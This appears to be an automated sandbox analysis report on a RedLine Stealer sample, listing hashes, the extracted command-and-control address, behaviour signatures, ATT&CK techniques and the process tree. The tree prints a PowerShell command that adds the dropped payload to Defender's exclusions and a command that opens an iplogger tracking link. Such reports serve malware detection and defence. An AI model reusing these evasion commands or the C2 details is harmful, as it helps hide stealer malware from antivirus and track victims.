Analysis

  • max time kernel
    138s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-en
  • submitted
    05-09-2021 17:15

General

  • Target

    e254914f5f7feb6bf10041e2c705d469bc2b292d709dc944381db5911beb1d9f (1).exe

  • Size

    1009KB

  • MD5

    7e06ee9bf79e2861433d6d2b8ff4694d

  • SHA1

    28de30147de38f968958e91770e69ceb33e35eb5

  • SHA256

    e254914f5f7feb6bf10041e2c705d469bc2b292d709dc944381db5911beb1d9f

  • SHA512

    225cd5e37dbc29aad1d242582748457112b0adb626541a6876c2c6a0e6a27d986791654fd94458e557c628dc16db17f22db037853fae7c41dde34ba4e7245081

Malware Config

Extracted

Family

redline

Botnet

Build1

C2

45.142.213.135:30058

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 36 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\e254914f5f7feb6bf10041e2c705d469bc2b292d709dc944381db5911beb1d9f (1).exe
    "C:\Users\Admin\AppData\Local\Temp\e254914f5f7feb6bf10041e2c705d469bc2b292d709dc944381db5911beb1d9f (1).exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:1664
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:1760
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:320
      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
        "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1040
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:696
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zSA1BB.tmp\Install.cmd" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1436
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/16B4c7
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1972
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1972 CREDAT:275457 /prefetch:2
            5⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:1512

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

Registry Run Keys / Startup Folder

1
T1060

Defense Evasion

Modify Registry

2
T1112

Discovery

System Information Discovery

1
T1082

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    MD5

    5739fee5e3f1aa78291e3af013ab5d03

    SHA1

    c702db66ca80444064859f7d413eaea14e5dc3f6

    SHA256

    4d5e09afc703abf66736bfdf6c88db1131536f771650f19f33249d2f1329a1fc

    SHA512

    39335e03770306b26daa528b71978c6c4d1380e6cdc3da4f8b38f6e36ca39554bb8d77da183bea5bfb2a71f4d7b9d9780eeaa976b55fe71796a7db68a4173317

  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\5ym4qqk\imagestore.dat
    MD5

    dcf681fbeaa43f1476188281ab12361c

    SHA1

    7696d86e9ce645769402bfa7737fbd2256100c54

    SHA256

    611610347a56ac73226d36e8ce475480f6caedf14d1210c7c030a1e6082cd02b

    SHA512

    fcc9e862cfb6ade6532c67d12dd7269d7c39e3f3c2810e9b42b5269a7d63081bf458a8c9c4e474694e851a419e8ed2554467334c0c8560b0cd610d25e78713b9

  • C:\Users\Admin\AppData\Local\Temp\7zSA1BB.tmp\Install.cmd
    MD5

    a3c236c7c80bbcad8a4efe06a5253731

    SHA1

    f48877ba24a1c5c5e070ca5ecb4f1fb4db363c07

    SHA256

    9a9e87561a30b24ad4ad95c763ec931a7cfcc0f4a5c23d12336807a61b089d7d

    SHA512

    dc73af4694b0d8390bcae0e9fd673b982d2c39f20ca4382fddc6475a70891ce9d8e86c2501d149e308c18cd4d3a335cc3411157de23acf6557ed21578c5f49cc

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
    MD5

    ef5fa848e94c287b76178579cf9b4ad0

    SHA1

    560215a7c4c3f1095f0a9fb24e2df52d50de0237

    SHA256

    949eec48613bd1ce5dd05631602e1e1571fa9d6b0034ab1bffe313e923aff29c

    SHA512

    7d4184aa762f3db66cf36955f20374bf55f4c5dbe60130deaeade392296a4124867c141f1d5e7fbf60b640ef09cce8fb04b76b7dd20cbac2ce4033f9882a1071

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
    MD5

    ef5fa848e94c287b76178579cf9b4ad0

    SHA1

    560215a7c4c3f1095f0a9fb24e2df52d50de0237

    SHA256

    949eec48613bd1ce5dd05631602e1e1571fa9d6b0034ab1bffe313e923aff29c

    SHA512

    7d4184aa762f3db66cf36955f20374bf55f4c5dbe60130deaeade392296a4124867c141f1d5e7fbf60b640ef09cce8fb04b76b7dd20cbac2ce4033f9882a1071

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
    MD5

    ef5fa848e94c287b76178579cf9b4ad0

    SHA1

    560215a7c4c3f1095f0a9fb24e2df52d50de0237

    SHA256

    949eec48613bd1ce5dd05631602e1e1571fa9d6b0034ab1bffe313e923aff29c

    SHA512

    7d4184aa762f3db66cf36955f20374bf55f4c5dbe60130deaeade392296a4124867c141f1d5e7fbf60b640ef09cce8fb04b76b7dd20cbac2ce4033f9882a1071

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
    MD5

    a628baa97881fa5528009c9470cadee0

    SHA1

    583aa730e302fe0015cdb0dee4e279f193d66d87

    SHA256

    e2bb9ee3616cd827cc3ee297cbe24cfbd2ded4d9efe894e68453f6cfbf18e4c5

    SHA512

    c84e496e13d30c24efd020f25f4cd55b6157feb529f7285d97445c386fd50a50e943b0f67745a861a97c5bf0c4ff7dee7b5240d52c59b66421a9bdc26de58faf

  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
    MD5

    a628baa97881fa5528009c9470cadee0

    SHA1

    583aa730e302fe0015cdb0dee4e279f193d66d87

    SHA256

    e2bb9ee3616cd827cc3ee297cbe24cfbd2ded4d9efe894e68453f6cfbf18e4c5

    SHA512

    c84e496e13d30c24efd020f25f4cd55b6157feb529f7285d97445c386fd50a50e943b0f67745a861a97c5bf0c4ff7dee7b5240d52c59b66421a9bdc26de58faf

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\ZR2D7188.txt
    MD5

    81968af56271b043e79fdbfbcb02fbf1

    SHA1

    fec8bf637565397ff8d80d552c1e266c64db5ba7

    SHA256

    77c7190a5b60a2a366056f8e0cbaa67e913a3eb440c2fce74517c12618ec8cff

    SHA512

    38e8c9aa3ea0e5dd1c32b6d26ecb0b27d0c7996b3ade4e8fb8582cfe5d5d7fcb1dbd8c6006def5a888224f12e660d7a4350a860a5946aa1709a2682a1c71a742

  • \Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
    MD5

    ef5fa848e94c287b76178579cf9b4ad0

    SHA1

    560215a7c4c3f1095f0a9fb24e2df52d50de0237

    SHA256

    949eec48613bd1ce5dd05631602e1e1571fa9d6b0034ab1bffe313e923aff29c

    SHA512

    7d4184aa762f3db66cf36955f20374bf55f4c5dbe60130deaeade392296a4124867c141f1d5e7fbf60b640ef09cce8fb04b76b7dd20cbac2ce4033f9882a1071

  • memory/320-78-0x0000000002300000-0x0000000002F4A000-memory.dmp
    Filesize

    12.3MB

  • memory/320-62-0x0000000000000000-mapping.dmp
  • memory/320-82-0x0000000002300000-0x0000000002F4A000-memory.dmp
    Filesize

    12.3MB

  • memory/320-81-0x0000000002300000-0x0000000002F4A000-memory.dmp
    Filesize

    12.3MB

  • memory/320-67-0x0000000075AD1000-0x0000000075AD3000-memory.dmp
    Filesize

    8KB

  • memory/696-70-0x0000000000000000-mapping.dmp
  • memory/1040-68-0x0000000000400000-0x000000000041E000-memory.dmp
    Filesize

    120KB

  • memory/1040-65-0x0000000000418E56-mapping.dmp
  • memory/1040-64-0x0000000000400000-0x000000000041E000-memory.dmp
    Filesize

    120KB

  • memory/1040-77-0x0000000004320000-0x0000000004321000-memory.dmp
    Filesize

    4KB

  • memory/1436-74-0x0000000000000000-mapping.dmp
  • memory/1512-80-0x0000000000000000-mapping.dmp
  • memory/1664-52-0x000007FEFC2A1000-0x000007FEFC2A3000-memory.dmp
    Filesize

    8KB

  • memory/1760-59-0x0000000000320000-0x000000000032D000-memory.dmp
    Filesize

    52KB

  • memory/1760-60-0x0000000007100000-0x0000000007185000-memory.dmp
    Filesize

    532KB

  • memory/1760-61-0x0000000000930000-0x000000000094A000-memory.dmp
    Filesize

    104KB

  • memory/1760-58-0x0000000004920000-0x0000000004921000-memory.dmp
    Filesize

    4KB

  • memory/1760-56-0x0000000000B60000-0x0000000000B61000-memory.dmp
    Filesize

    4KB

  • memory/1760-53-0x0000000000000000-mapping.dmp
  • memory/1972-79-0x0000000000000000-mapping.dmp